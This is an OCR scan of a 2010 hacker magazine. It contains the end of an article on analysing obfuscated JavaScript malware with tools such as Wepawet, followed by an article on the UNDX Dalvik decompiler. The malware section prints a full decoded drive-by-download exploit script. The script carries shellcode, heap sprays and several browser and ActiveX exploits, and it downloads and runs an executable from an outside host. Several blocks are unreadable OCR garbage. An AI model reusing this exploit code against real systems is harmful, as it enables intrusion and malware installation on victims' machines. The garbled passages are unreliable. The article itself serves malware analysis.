Download : https://developer.mozilla.org/en/Spider- 
Monkey. 

2. Caffeine Monkey: The tool unmasks what the 
code is actually doing and allows researchers to create 
algorithms/functions to classify in whatever way they 
might want to. One of the key components of this 
tool is that it is behavior based, not signature based. 

It identifies specific behaviors that are indicative of 
malicious code. 

Download : http://www.secureworks.com/research/ 
tools/caffeinemonkey.html 

The above stated tools can do the trick. The 
JavaScript analyzers are handy in analyzing lot of cus- 
tom obfuscated script. The obfuscated code should 
be placed in .js extension file and passed as parameter 
to the JavaScript engine for execution of code. 

The exploit_hell function consists of the below 
presented code. 



i i i In i 'i ii il ■ ■ * i ii * li i\ m i t ii if I h if 1 ■ il ■ i n n in Hi ti n if I n ■ i i m I I i I ■ i ■ 

«#-fc W r*jj^a»J»*.kP»,pr*'***ii M'jM.rtt"*. *™ jf*?r»*»»<nk^%jj^ p.m 

**3\DH-3**»- JP%4P^TCV.? J*h J r^rl*H+TVHl-H4#»%-l-/^-iW^* W^JW^-l-P'X.Zf H-iHP*. iV+M+r JP 
** JJ-H JJ hJrMJM4«il] J-H-*-.P*rM h*« 1-H-H IH^VI^if^ 3-P-V?D*v/J tM 

-*Aj-».J'>*..'J»*.'J-».hj«..rj-, Jl r*.*L i,P.F .>»-, Jd^U^JlJ.».»l««.N«* PI-. JVHJVN I1K1J 

^HT J kMlJH h M]lirMi«W;il> J Fi;i}i% Jf*.2tiJ1-Wil*H JtiUtoJAJik-Mr'te Jta-H.HJ4.-r3 1 iihH 

jtipp r r i+t+r ojrji+i* r*» f f* j *» pp i i r« rareru f\ wipm-pn j#«* wj^»jt^i jt^hi 

H -S- M J J *k ] # J C p _■' d J r**.Jd JdirfLfr*** J*Ji»J1 TlWJd JdipPh Im2an*i3 n>*% 3d JfpifdHhTAH JIHvJ 

jJMSttHu rj jti MJJnUttl1UC« JbU Jjf*t Ji Mrf H Ut2**l§J4itrtnr* linti i }f*%Mt4 

rMJ iUIHwUfvHlkr^ tcr** la Jfcr« r i4.16*+± lifJ'^^ilJ^MJ r-teJf^Mf Jf.H-tta.i- 
p.Cf m.lfT*i*-J4*+r J 1 1 [%/*)iJ'1'J I * / P T+w J P I* J*} rWTK -H- TV Mm J 1 T^HJP i ti t I ' ^»^p P3g 
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■ HJiNr^ii^ J-CJP. r i -Ot r***4 r I -hJ4JJi*% Jv tj -..'i--, jp i ■ J* i »*, 3a ii t p.jjii *, M Jc* ■ » 

i h ^mpiM^ftii^ ^rt*- ji-M-^f ji r^-jFP-jpp* 1+wt^.jnp.jf KpfrM 1 *- ip jj-h-jpji^h: 

■■rJJ Fd^M J J«* 3*J,f rfi J«<* J*Jfi.d J3 HJMH M-r J436.-I J##«f.'tHTlS*i J13£rjT? JH* J* 

to* J 4 * JVHrM ■' Tf« J«, J -5 J3 fd ->.- W J*>MJdP J3*f *i JPi4*r9 JPM J* llr^HJ^ISl 

■ PJ% J*JJ'-* JI J I J»JI^;*WS JlT4--k«"U JIT-l-r ;iNrf#l-IV7IKr-h .'^ tXJtri-c 
imnttftiT*** S JIMtJ 4JV**MJf p*i H^ft J/S tt**f+f i«fWJSNJMt r*S J#JP# p*#p 
-PHJi MfAThrW-Jd Jtrri-H ^ J> J ^ J+JfiKd W*s Jd W p^rt J6^|-«*k JlS J+y J/W^-rJi JJ>i-J*J J HJ 
nfcrt rp^j*j.i-ta /p. i*,«ftr4:»M.Hirt* u^J* u«. *^#a.ik«or>.jrF. w.^hp» .t, u.ru.' 
^3^lr4JTI^J40«FJtol'b^JdJJ^I|iJE'^7CtaJIP3«*iJdJJ«*2PJ«lvJTd3 H3HMHIWi»riHl 
VHJfi ]p3p*.-'iJi^.i J/« h*J^ 3dvJ J /ilk* J£MwJ3 J J«h3d Jd#Jd/d«i j*j 3*.J*J r **HT**Ji J**» jh jj 

J*JbrB JH% JH*b JiT*^-J*Jlr7(,'f^ Jd /r'WIHv^ ■■■P^. UtJli.'rJrS i*H. .'/i > Jrj** 

Pdjfp WdJJi^buM Jj Jf*rt i d^. 3-1*1 lib id 1&./ui«^iM.i a kp-h J« Mi dp. iflliikiilfti 

J3-«JdM^3 J I p K Jd>1v3 J Tp KJdJ3<HJd3^3IJ-K3-MC^N rai(fcpW JHi JMf*T«J3 *.**4i ¥>JiJJ 3>*» 

n«i«4"i%ffj r^j<pjr» J* p ^j<ji^pj<jm * «i ^ i VrtM*Wi 
■rt^r^Ji/px/im/^r/^tofti^j^^ 

lrnMVti*#>-ird JHMh iMMl JfthM J J »iJWi> 14 J 3 rjfirJ.iitrtf lie*--* Jl3f I -S H JC-HJi Jic^ 
n/MAmw.rjiMdx^aiir^i-b I ■«. U^hMr -« xft i n.yiin.yi t*,,*™..-'^! imcjff^n. in 1 1 Hinut 
%N J Jlr»3 I P3 *fc-Jd JH-MH JP Jlc^J 1 * Jl^.rt-»*»rMJ » Ji LJTX^W J J-OTHH JI^JTH^M J3«fl 
™.. i*» **M ri»frw ** Ml J HWmJHJpMHHiPMWHHI*', V74^%T4JhM 
'V.S1J3 JdJJ.1-* 2041 r-H^Q^ J*H«PJ^ WLi'i-.V-HJL^JO'HJ,* ^t-Jt J(nrniJW-^rti5L-.|-S-?«( 

^J*J T*'-'fcjr#iJi rPNN^iTPi ■«W-^J-piri^J-pJJP3p^«i^«'*r^-J/^iW%^'-i-i'~»-/Pj:j^J-PT--J*'-J- 

ijJbmlii*«Ji 
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It clearly explains the working functionality of a 
malware. 

4. Web Based Real Time Dynamic Detection of 
Obfuscated Code 

For analyzing very complex code, it is always prefer- 
able to try the automated or online obfuscation scan- 
ners. The reason is in real time environment time is a 
complex factor. But we lay stress on all the techniques 
because every single logic works efficiently at certain 
point. Let'try the online web malware analysis tool. 

Wepawet: Wepawet is a service for detecting and ana- 
lyzing web-based malware. It currently handles Flash 
and JavaScript files, wepawet runs various analyses 
on the URLs or files that you submit. At the end of 
the analysis phase, it tells you whether the resource is 
malicious or benign and provides you with informa- 
tion that helps you understand why it was classified in 
a way or the other, wepawet displays various pieces of 
information that greatly simplify the manual analy- 
sis and understanding of the behavior of malicious 
samples. For example, it gives access to the unobfus- 
cated malicious code used in an attack. 
Alpha Release: http://wepawetiseclab.org/index.php 



The reason for the suitability of WEPAWET is shown 
with an example below. The below mentioned is one 
of the example: 











■ 4rfh.-r.i- l-]tri*rt ill t iVifair w ,ifrfarKi ftfi^<ji| 
ajBT^flWOff iHTilittM iPi 1 1 1 II 1 ifrHM 




1 







The code is really bad in its outlook. But when 
it is analyzed with WEPAWET it has another face to 
show. The reason of the online and automated use of 
JavaScript analyzers is that it becomes easy to trace 
the reported exploit code if any malware using it. Let's 
see: 



Jri t rfci-n rniJn: 








Jwwi.OJ.cn' m*fck« 








ItaDtotlwi HrlMrtitv 


HEAC JOt**, n M frvftk 


jud .k Hn .HJuJI [mi 


*%* i&ifrtHir,. 


fli lXC3 



Without a doubt it is an exploit that is used for Drive 
by Download Infection. 
The decoded script is 

var url = 'http : / /updatez . inf o/etc/getexe . exe?o=l & 
t=1204152273&i=2204827752&e=' ; var shellco = 
> %u54EB%u758B%u8B3C + > %u3574%u0378%u56F5%u768B' 
+ > %u0320%u33F5%u49C9%uAD41' + 
> %uDB33%u0F36%ul4BE%u3828' + 
> %u74F2%uC108%uODCB%uDA03' + 
> %uEB40%u3BEF%u75DF%u5EE7' + 
> %u5E8B%u0324%u66DD%u0C8B' + 
> %u8B4B%ulC5E%uDD03%u048B' + 
> %u038B%uC3C5%u7275%u6D6C + 
> %u6E6F%u642E%u6C6C%u2e00' + 
> %u5C2e%u2e7e%u7865%u0065' + 
> %uC033%u0364%u3040%u0C78' + 
> %u408B%u8B0C%ulC70%u8BAD' + 
> %u0840%u09EB%u408B%u8D34' + 

> %u7C40%u408B%u953C%u8EBF' + * %uOE4E%uE8EC%uFF8 4%u 
FFFF%uEC83%u8304' + * %u2 42C%uFF3C%u95D0%uBF5 0 ' + 
> %ulA36%u702F%u6FE8%uFFFF' + 
> %u8BFF%u2454%u8DFC%uBA52' + 
> %uDB33%u5353%uEB52%u5324' + 
> %uD0FF%uBF5D%uFE98%u0E8A' + 
> %u53E8%uFFFF%u83FF%u04EC + 
> %u2C83%u6224%uD0FF%u7EBF' + 

> %uE2D8%uE873%uFF40%uFFFF' + * %uFF52%uE8D0%uFFD7% 
uFFFF%u7 4 68%u7 07 4%u2F3A%u7 52F%u647 0%u7 4 61%u7A65%u6 
92E%u6 66E%u2F6F%u7 4 65 %u2F63%u65 67%u657 4%u657 8%u65 
2E%u657 8%u6F3F%u313D%u742 6%u313D%u3032%u3134%u32 35 
%u37 32%u2 633 %u3D69%u32 32%u34 30%u32 38%u37 37%u32 35% 
u652 6%u2 03D' ; var nop = ^90', success = 0; var 
exeurl = url + ; function Create0(o, n) { var 
r = null; try { r = o . CreateOb j ect (n) } 

catch (e) { } if (!r){ try { r = 

o . CreateOb j ect (n, } catch (e) { } 

} if (!r){ try { r = o . CreateOb j ect (n, 

} catch (e) { } } if (!r) { 

try { r = o . GetOb j ect ( , n) } catch 

(e) { } } if (!r) { try { r = o. 

Get0bject(n, } catch (e) { } } 

if (!r){ try { r = o . GetOb j ect (n) } 

catch (e) { } } return (r) ; } function 

Go (a) { var fso = a . CreateOb j ect ("Scri" + "pting. 
File" + "Sys" + "temOb" + "ject", "")var sap = 
Create0(a, "She" + "ll.Applic" + "ation"); var 
nl = null; fname = "filel51.exe"; fname = fso. 
BuildPath ( f so . GetSpecialFolder (2) , fname); try { 
nl = Create0(a, "Micr" + "osoft.XMLH" + "TTP") ; 
nl . open ("GET", exeurl, false); } catch (e) { 
try { nl = Create0(a, "MSX" + "ML2.XMLH" + 



36 JANUARY 2010 



Keeping Knowledge Free 



HUB Magazine I 

www.hackinthebox.org 



"TTP") ; nl . open ("GET", exeurl, false); } 

catch (e) { try { nl = CreateO(a, 

"MSX" + "ML2 . ServerX" + "MLHTTP" ) ; nl . 

open ("GET", exeurl, false); } catch 

(e) { try { nl = new 

XMLHttpRequest ( ) ; nl . open ( "GET" , exeurl, 

false) ; 

} catch (e) { return 0; } 

} } } nl . send (null) ; rb = nl . 

responseBody ; var x = CreateO(a, "ADO" + "DB. 
Str" + "earn"); x.Type = 1; eval("x." + repl[0] 
+ "=3;x." + repl[l] + "();x." + repl[2] + 
"(rb);x." + repl[3] + " ( f name , 2 ) ; sap . " + repl[4] 
+ "(fname);"); return 1; } var repl = new 
Array ("Mo" + "de", "Op" + "en", "Wr" + "ite", "Sa" 
+ "veTof" + "ile", "She" + "llEx" + "ecute") ; 
function mdac () { var i = 0; var target = new 
Array("BD96" + "C556-65A3-11D0-983A-00C04F" + 
"C29E36", "BD96" + "C556-65A3-11D0-983A-00C04F" 
+ "C29E30", "AB9B" + "CEDD-EC7E-47E1-9322-D4A210" 
+ "617116", "0006" + "F033-0000-0000-C000- 
000000" + "000046", "0006" + "F03A-0000-0000- 
C000-000000" + "000046", "6e32" + "070a-766d-4ee6- 
879c-dclfa9" + "Id2fc3", "6414" + 

"512B-B978-451D-A0D8-FCFDF3" + "3E833C", "7F5B" + 
"7F63-F06F-4331-8A26-339E03" + "C0AE3D", "0672" + 
"3E09-F4C2-43c8-8358-09FCDl" + "DB0766", "639F" 
+ "725F-1B2D-4831-A9FD-874847" + "682010", "BA01" 
+ "8599-lDB3-44f 9-83B4-461454" + "C84BF8", 
"D0C0" + "7D56-7C69-43F1-B4A0-25F5A1" + 
"1FAB19", "E8CC" + "CDDF-CA28-496b-B050-6C07C9" + 
"62476B", null); while (target [i]){ var a = 

null; 

a = document . createElement ("object") ; a. 
setAttribute ("classid", "clsid:" + target [i]); 
if (a) { try { var b = CreateO(a, 

"Sh" + "ell.Appl" + "ication") ; if (b) { 

if (Go (a) ) return 1; } } catch 

(e) { } } i++; } } if (mdac() ) 

success = 1; if (! success) { document, 
write ( "<script language=VBScript>\r\n" + 'Set 
elem=document . createElement ( "obj ect" ) ' + "\r\n" + 
' f name="f ile234 . exe" ' + "\r\n" + 'elem. 
setAttribute "id", "elem"' + "\r\n" + 'elem. 
setAttribute "classid" , "clsid : BD96 ' + 'C556- 
65A3-11D0-983A-00C04F' + 'C29E36'" + "\r\n" + 'Set 
obj=elem.CreateObject ("She' + 'll.Appli' + 
'cation","")' + "\r\n" + "Set nsp=obj . 
NameSpace (20 ) \r\n" + 'Set pnm=nsp. 
ParseName ("Symbol . ttf") ' + "\r\n" + 
'tmp=Split (pnm. Path, "\\", -1, 1) ' + "\r\n" + 
'path=tmp(0) & "\\" & tmp(l) & "W" + "\r\n" + 
"fname=path & fname\r\n" + 'set tpqpd=CreateOb j e 
ct ("Micr"+"osoft . XML"+"HTTP" ) ' + "\r\n" + 
'iiqu=tpqpd. ' + repl[l] + '( "GET" , exeurl , 0 ) ' + 
"\r\n" + "tpqpd . Send ( ) \r\n" + "On Error Resume 
Next\r\n" + "egsyho=tpqpd . responseBody\r \n" + 
'Set acvqqrp=elem. CreateObject ("Scri' + 'pting. 
FileSyst' + 'emOb j ect" , " " ) ' + "\r\n" + "Set 
kld=acvqqrp . CreateTextFile (fname, TRUE) \r\n" + 
"lotzom=LenB (egsyho) \r\n" + "For j=l To lotzom\ 
r\n" + "plkosl=MidB (egsyho, j , 1 ) \r\n" + 
"qamplxd=AscB (plkosl ) \r\n" + "kid. 
Write (Chr (qamplxd) ) \r\n" + "Next\r\n" + "kid. 
Close\r\n" + 'Set yipt=elem. CreateOb j ect ("WScr ' 
+ ' ipt . Shell" ,"") ' + "\r\n" + "On Error Resume 
Next\r\n" + "yipt.Run fname, 1 , FALSE\r\n" + '<\/ 
script>' ) ; } if (! success) { exeurl = url + '9'; 
document . write ( '<object 
classid="clsid: 5 9DBDDA6-9A8 0-42A4-B82 4- 
9BC50CC172F5" id=" test "></ob j ect>' ) ; try { 
test . DownloadFile (exeurl , "..\\~tmp0001.exe", "0", 



"0") ; document . location = "exploits/x9 . 

php?zenturi=l" ; 

} catch (e) { } } if (! success) { var hstoaddr 
= 0x05050505; var mystring = unescape ( shellco + 
'%u2033'); var hbsize = 0x400000; var plsize = 
mystring . length * 2; var spslsize = hbsize - 
(plsize + 0x38); var spsl = unescape ("%u" + nop 
+ nop + "%u" + nop + nop); while (spsl. length * 
2 < spslsize) { spsl += spsl } spsl = spsl. 

substring (0, spslsize / 2); hblocks = (hstoaddr 

- 0x400000) / hbsize; memory = new Array (); 
for (i =0; i < hblocks; i ++ ) { memory[i] = 
spsl + mystring } var ssrt = ' method="' ; 
for (i =0; i < 10437; i ++ ) { ssrt += 
'ԅ' } document . write ( ' <html 

xmlns : v="urn : schemas -micro so f t-com : vml"Xob j ect 
id="VMLRender" classid="CLSID : 1 0072C EC-8CC1-11D1- 
98 6E-0 0A0C955B42E"X/object><style>v\\ : * {behavior : 
url (#VMLRender) ; }</style><v : rect 
style="width: 120pt;height : 80pt" 
f illcolor="red"Xv : f ill' + ssrt + 
' "x/v : rectx/v : f ill>' ) ; } if (! success) { var 
mystring = '%u' + nop + nop + shellco + '%u2032'; 
while (mystring . length < 3072) { mystring += 

'%u' + nop + nop } ; mystring = 
unescape (mystring) ; var bigb = 
unescape ("%u0c0c") ; while (bigb. length <= 
0x100000) { bigb += bigb } var memory = new 

Array (); for (var i = 0; i < 120; i ++ ) { 
memory [i] = bigb . subs tring ( 0 , 0x100000 - mystring. 
length) + mystring } var repl = new 
Array("Web", "View", "Folder", "Icon"); var wvfi 
= repl[0] + repl[l] + repl [2] + repl [3] + '.' + 
repl[0] + repl[l] + repl [2] + repl [3] + '.1'; 
for (var i = 0; i < 1024; i ++ ) { var wvfio = 

new ActiveXObj ect (wvfi ) ; eval ("try {wvfio . sets" 

+ "lice (0x7ffffffe, 0, 0, 2 02116108) ; } catch (e) { }") ; 
var wvfit = new ActiveXObj ect (wvfi ) ; } } if 
( [success) { document . write ( "<object 
classid=' clsid:DCE2F8Bl-A52 0-HD4-8FD0- 
00D0B7730277' id=' target 1 ' x/obj ect>" ) ; 
document . write ( "<ob j ect 
classid=' clsid: 9D3 922 3E-AE8E-1 1D4- 8FD3- 
00D0B7730277' id=' target2 ' x/obj ect>" ) ; var 
mystring = unescape ( shellco + '%u3031'); 
bigblock = unescape ( "%u" + nop + nop + "%u" + nop 
+ nop); slspace = 20 + mystring . lengthwhile 
(bigblock . length < slspace) bigblock += bigblock; 
fillblock = bigblock . substring ( 0 , slspace); 
block = bigblock . substring ( 0 , bigblock . length 

- slspace); while (block . length + slspace < 
0x40000) block = block + block + fillblock; 
memory = new Array () ; for (x = 0; x < 80 0; x ++ 
){ memory[x] = block + mystring } buffer = 
'\x0a'; while (buf fer . length < 5000)buffer += '\ 
x0a\x0a\x0a\x0a' ; try { try { targetl. 
server = buffer; targetl . initialize () ; 
targetl . send ( ) } catch (e) { target2 . 
server = buffer; target2 . receive () ; } 

} catch (e) { } } if (! success) { var repl = 
"A09AE68F"; document . write ( '<object 
classid="clsid: ' + repl + '-B14D-43ED-B713- 
BA413F034904" id="winzip"x/ob j ect>' ) ; var 
mystring = unescape ( shellco + '%u2038'); var 
hstoaddr = OxOcOcOcOc; var hbsize = 0x400000; 
var spslsize = hbsize - (mystring . length * 2 + 
0x38); var bigb = unescape ("%u" + nop + nop + 
"%u" + nop + nop); while (bigb. length * 2 < 
spslsize) { bigb += bigb } bigb = bigb. 

substring (0, spslsize / 2); hblocks = (hstoaddr 

- 0x400000) / hbsize; var memory = new Array (); 
for (var i = 0; i < hblocks; i ++ ) { 
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memory [i] = bigb + mystring } var test = w ; 
for (i = 1; i < 231; i ++ ) { test += *A' } 

test += "\xOc\xOc\xOc\xOc\xOc\xOc\xOc"; try { 
winzip . CreateNewFolderFromName ( test ) } catch 

(e) { } } if (! success) { try { var test = 

new ActiveXObj ect ( ^QuickTime . QuickTime' ) ; var 
mystring = unescape ( shellco + > %u2037'); var 
hstoaddr = OxOcOcOcOc; var hbsize = 0x400000; 

var spslsize = hbsize - (mystring . length * 2 + 
0x38); var bigb = unescape ("%u" + nop + nop + 

"%u" + nop + nop); while (bigb. length * 2 < 

spslsize) { bigb += bigb } hblocks = 

(hstoaddr - 0x400000) / hbsize; bigb = bigb. 

substring(0, spslsize / 2); var memory = new 

Array () ; for (var i = 0; i < hblocks; i ++ ) { 

memory [i] = bigb + mystring } document, 

write (' <object CLASSID="clsid: 02BF25D5-8C17-4B23- 
BC80-D3488ABDDC6B"Xparam name="src" value="expl 
oits/x7b . php"><param name="autoplay" 
value="true"xparam name="loop" 
value="f alse"xparam name=" controller" 
value="true"x/ob j ect>' ) ; } catch (e) { } } 
if (! success){ var mystring = unescape ( shellco + 

> %u3231'); document . write ( x <html xmlns="http : / / 
www . w3 . org/1 99 9/xhtml"Xob j ect id=target 
classid="CLSID: 8 8d96 9c5-f 192- Ild4-a65f- 
0040963251e5"x/object>' ) ; var spslsize = 
0x400000 - (mystring. length * 2 + 0x38); var 
spsl = unescape ("lu" + nop + nop + "%u" + nop + 
nop) ; while (spsl. length * 2 < spslsize) { 
spsl += spsl } var hblocks = (0x05050505 - 
0x400000) / 0x400000; var memory = new Array (); 
for (i =0; i < hblocks; i ++ ) { memory[i] = 



spsl + mystring } var obj = document. 
getElementByld ( 'target' ). obj ect; try { obj. 
open (new Array (), new Array (), new Array (), new 
Array () , new Array ()) } catch (e) { } try { 
obj. open (new Object (), new Object (), new Object (), 
new Object (), new Object ()) } catch (e) { } 
try { ob j . setRequestHeader (new Object (), 

* ') } catch (e) { } for (i = 0; i < 

11; i ++ ) { try { obj . 

setRequestHeader (new Object () , 0x12345678) } 
catch (e) { } } } if (! success) { document, 

write ( ^ <applet archive="exploits/xl5b .php" 
code="BaaaaBaa . class" width=l height=lxparam 
name="ur 1" value="' + url + * 15"x/applet>' ) ; } 
if (! success){ var mystring = unescape ( shellco + 
*%u3631'); var hstoaddr = 0x04060406; var 
plsize = mystring . length * 2; var hbsize = 
0x400000; var spsl = unescape ("lu" + nop + nop + 
"%u" + nop + nop) ; var spslsize = hbsize - 
(plsize + 0x28); var hblocks = (hstoaddr - 
01000000) / hbsize; while (spsl. length * 2 < 
spslsize) { spsl += spsl; } spsl = spsl. 

substring (0, spslsize / 2); var memory = new 
Array (); for (i =0; i < hblocks; i ++ ) { 
memory [i] = spsl + mystring } document . write ( * 
<style>BODY{CURSOR:url ( "exploits /xl 6b . php" ) }</ 
style>' ) ; } if (success) { document . write ( w ) ; } 
else { document . write ( w ) ; } 

That's how effective is WEPAWET for detecting ex- 
ploit spreading through malware. • 
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Reconstructing Dalvik Applications 

Using UNDX 

By Marc Schonefeld 



As a reverse engineer I have the tendency to 
look in the code that is running on my mobile 
device. I am coming from a JVM background, 
so I wanted to know what Dalvik is really about. Addi- 
tionally I Wanted to learn some yet another bytecode 
language, so Dalvik attracted my attention while sit- 
ting on a boring tax form. As I prefer coding to doing 
boring stuff, I skipped the tax declaration and coded 
the UNDX tool, which will be presented in the follow- 
ing paragraphs. 

What is Dalvik 

Dalvik is the runtime that runs userspace Android 
applications. It was invented by Dan Bornstein, a very 
smart engineer at Google, and he named it after a vil- 
lage in Iceland. Dalvik is register-based and does not 
runs java bytecode. It runs it's own bytecode dialect 
which is executed by this Non-JVM runtime engine, 
see the comparison in Table 7. 



Table 7: Dalvik vs. JVM 






Dalvik 


JVM 


Architecture 


Register 


Stack 


OS-Support 


Android 


Multiple 


RE-Tools 


Few 


Many 


Executables 


APK 


JAR 


Constant-Pool 


per Application 


per Class 



Dalvik Development process 

Dalvik apps are developed using java developer 
tools on a standard desktop system, like eclipse (see 
Figure 7)or Netbeans IDE. The developer compiles the 
sources to java classes (as with using the javac tool). 
In the following step he transform the classes to the 
dalvik executable format (dx), using the dx tool, which 
results in the classes.dex file. This file, bundled with 
meta data (manifest) and media resources form a 
dalvik application, as a 'apk' deployment unit. An APK- 



Figure 1: Dalvik Development environment 




file is transferred to the device or an emulator, which 
can happen with adb, or in most end-user cases, as 
download from the android market. 



Dalvik runtime libraries 

A dalvik developer can choose from a wide range of 
APIs, some known from Java DK, and some are Dalvik 
specific. Some of the libraries are shown in Table 2. 



Table 2: Dalvik APIs 






Dalvik 


JVM 


java.io 


Y 


Y 


java.net 


Y 


Y 


android/ 


Y 


N 


com.google.* 


Y 


N 


javax.swing.* 


N 


Y 
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Figure 2: Default development process 




Figure 3: Development process with undx 




DALVIK DEVELOPMENT FROM A REVERSE 
ENGINEERING PERSPECTIVE 

Perspectives 

Dalvik applications are available as apk files, no source 
included, so you buy/download a cat in the bag. Typical 
questions during reverse engineering of dalvik appli- 
cations are find out, whether the application contains 
malicious code, like ad/spyware, or some phone home 
functionality that sends data via a hidden channel to 
the vendor. Additionally one could query whether an 
application or the libraries it statically imports (in it's 
APK container) has unpatched security holes, which 
means that the dex file was generated from vulner- 
able java code. A third reverse engineering perspective 
would check whether the code contains copied parts, 
which may violate GPL or other license agreements. 



Parsing DEX files 

Design 

The dexdump tool of the android SDK can perform a 
complete dump of dex files, it is used by UNDX, Table 
3 lists the parameters that influenced the design of 
the parser. The decision was to use as much of use- 
able information from dexdump, for the rest we parse 
the dex file directly. Figure 4 shows useful dexdump 
output, which is relatively easy to parse, compared 
to native Dex structures. On the other hand there are 
frequent omissions in the output of dexdump, such as 
the dump of array data (as in Figure 5). 



Table 3: Parsing strategy 




dexdump 


parsing directly 


Speed 


Time advantage, do 
not have to write 
everything from 


Direct access to binary 
structures (arrays, jump 
tables) 


Control 


dexdump has a 
number of nasty 
bugs 


Immediate fix possible 


Available info 


Filters a lot 


All you can parse 



Figure 4: Dexdump output 
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Workflow 

Dalvik programmers follow a reoccurring workflow 
when coding their applications. In the default setup 
this involves javac, dx. There is no way back to java 
code once we compiled the code (see Figure 2). This 
differs from the java development model, where a de- 
compiler is in the toolbox of every programmers. Our 
tool UNDX fills this gap, as shown in see Figure 3. 

Design choices 

Undx main task is to parse dex file structures. So 
before coding the tool there was a set of major design 
questions to be decided. The first was about the reuse 
grade of the parsing strategy, the second one was the 
library choice for generating java bytecode. 



Figure 5: Dexdump array dump output 
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We chose the BCEL (http://jakarta.apache.org/bcel/) 
as bytecode backend, as it has a very broad func- 
tionality (compared to the potential alternatives like 
ASM and javassist), however this preference is solely 
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based on the authors subjective view and experience 
with BCEL Figure 6, which was taken from the BCEL 
documentation), shows the object hierarchy provided 
by the BCEL classes. 



Figure 6: BCEL hierarchy 




Processing Steps 

Figure 7 shows the steps that are necessary to parse 
an APK back into a java bytecode representation. First 
global APK structures are read, then the methods are 
processed. In the end the derived data is written to a 
jar file. 



Figure 7: Processing steps 
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Processing of global structures: Processing the glob- 
al structures involves extracting the classes.dex file 
from the APK archive (which is a zip container), and 
parsing global structures, like preparing constants for 
later lookup. In detail this step transforms APK meta 
information into relevant BCEL structures, for example 
retrieve the Dalvi String table and store its values in a 
JAVA constant pool. 

Process classes: Transforming the classes involves 
splitting the combined meta data of the classes within 
a dex file into individual class files. For this purpose 
we parse the meta data, process the methods, by in- 
specting the bytecode and generate BCEL classes, as 



we now have all necessary meta data available and all 
methods of a class are parsed. The BCEL class object is 
then ready to be dumped into a class file, as entry of 
the output jar file. 

Processing class Meta Data: This step includes 
extracting the meta data first, then transferring the 
visibility, class/interface, classname, subclass informa- 
tion into BCEL fields. The static and instance fields of 
each class have to be created, too. 

Process the individual methods: The major work of 
UNDX is performed in transferring the Davlik byte- 
code back into JVM equivalents. So first we extract 
the method meta data, then parse all the Instructions 
and generate BCEL methods for each Dalvik method. 
This includes transforming method meta data to BCEL 
method structures, extracting method signatures 
setting up local variable tables, and mapping Dalvik 
registers to JVM stack positions. A source snippet for 
this is shown in Figure 8. 



Figure 8: Acquire method meta data 

private MethodGen getMethodMeta (ArrayList<String> 

al, ConstantPoolGen pg, 

String classname) { 

for (String line : al) { 

KeyValue kv = new KeyValue (line . trim ()) ; 
String key = kv.getKeyO; String value = 
kv. getValue () ; 

if (key .equals (str_TYPE) ) type = value. 
replaceAl 1 ( " ' " , " ") ; 

if (key. equals ("name") ) name = value . replaceAll (""', 
""); 

if (key .equals ("access") ) access = value . split (" ") 
[0] . substring (2) ; 

all found = (type . length () * name . length ( ) * access. 

length () != 0) ; 

if (all found) break; 

} 

Matcher m = me thodtypes .matcher (type) ; 
boolean n = m. find () ; 

Type [] rt = Type . getArgumentTypes ( type) ; 

Type t = Type. getReturnType (type) ; 

int access2 = Integer .parselnt (access , 16); 

MethodGen fg = new MethodGen (access2 , t, rt, null, 

name, classname, 

new InstructionList () , pg) ; 

return fg; 



Generating the java bytecode instructions: The de- 
tails for creating BCEL instructions from Dalvik instruc- 
tions are very work-intensive. First BCEL InstructionLists 
are created, then NOP proxies for every Dalvik instruc- 
tion to handle forward jump targets are prepared. 
Then for every Dalvik instruction add an equivalent 
JVM bytecode block to the JVM InstructionList. In this 
conversion loop UNDX spends most of it's time. Not ev- 
ery instruction can be processed one-to-one, as some 
storage semantics are differing between Dalvik and 
JVM,as shown in Figure 9, Figure 10 and Figure 7 /.The 
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Figure 9: Transforming the new-array opcode 

private static void handle_new_ar ray (String [ ] ops, 
InstructionList il, 

ConstantPoolGen cpg, LocalVarContext lvg) { 

String vx = ops [1] . replaceAll (" , " , "") ; 

String size = ops [2] . replaceAll ("," , "") ; 

String type = ops [3] . replaceAll ("," , n ") ; 

il . append (new ILOAD ( (short) lvg. 

didx2jvmidxstr (size) ) ) ; 

if (type . substring (1) . startsWith ("L") 

|| type. substring (1) .startsWith ("[") ) { 

il . append (new ANEWARRAY (Utils . doAddClass (cpg, type . 

substring (1) ) ) ) ; 

} else 

{ 

il .append (new NEWARRAY ( (BasicType) Type. 

getType (type 

. substring (1) ))) ; 

} 

il . append (new ASTORE (lvg. didx2jvmidxstr (vx) ) ) ; 

2 

Figure 10: Transforming virtual method calls 

private static void handle_invoke_virtual (String [] 
regs, String [] ops, 

InstructionList il, ConstantPoolGen cpg, 
LocalVarContext lvg, 

OpcodeSequence oc, DalvikCodeLine del) { 

String classandmethod = ops [2] . replaceAll ("," , "") ; 

String params = getparams (regs) ; 

String a[] = extractClassAndMethod (classandmethod) ; 
int metre f = cpg . addMethodref (Utils . 
toJavaName(a[0] ) , a[l] , a [2]); 

genParameterByRegs (il , lvg, regs, a, cpg, metre f, 
true) ; 

il . append (new INVOKEVIR TUAL (metre f) ) ; 

DalvikCodeLine nextlnstr = del .getNext () ; 

if (! nextlnstr ._opname . startsWith ("move-result") 

&& ! classandmethod. endsWith (") V") ) { 

if (classandmethod. endsWith (") J") \\ 

classandmethod . endsWith (")D") ) { 

il . append (new P0P2 () ) ; 

} else { 

il . append (new POP () ) ; 



Figure 1 7: Transforming sparse switches 

String reg = ops [1 ] . replaceAll (",", "") ; 

String reg2 = ops [2] . replaceAll ("," , "") ; 

DalvikCodeLine dclx = bll.getByLogical0ffset(reg2); 

int phys = dclx . getMemPos ( ) ; 

int curpos = del . getPos ( ) ; 

int magic = getAPA () .getShort (phys) ; 

if (magic != 0x0200) { Utils . stopAndDump ("wrong 

magic") ; } 

int size = getAPA (). getShort (phys + 2); 
int[] jumpcases = new int [size] ; 
int[] offsets = new int [size] ; 

InstructionHandle [] ihh = new InstructionHandle [size] ; 
for (int k = 0; k < size; k++) { 

jumpcases [k] = getAPA (). getShort (phys + 4 + 4 * k) ; 
offsets [k] = getAPA () .getShort (phys + 4 + 4 * (size + 
k)); 

int newoffset = of f sets [k] + curpos; 

String zzzz = Utils . getFourCharHexString (newoffset) ; 

ihh[k] = ic. get (zzzz) ; 

} 

int defaultpos = del .getNext () .getPos () ; 

String zzzz = Utils .getFourCharHexString (defaultpos) ; 

InstructionHandle theDefault = ic. get (zzzz) ; 

il . append (new ILOAD (locals . didx2jvmidxstr (reg) ) ) ; 

L00KUPSWITCH ih = new LOOKUPSWITCH (jumpcases , ihh, 

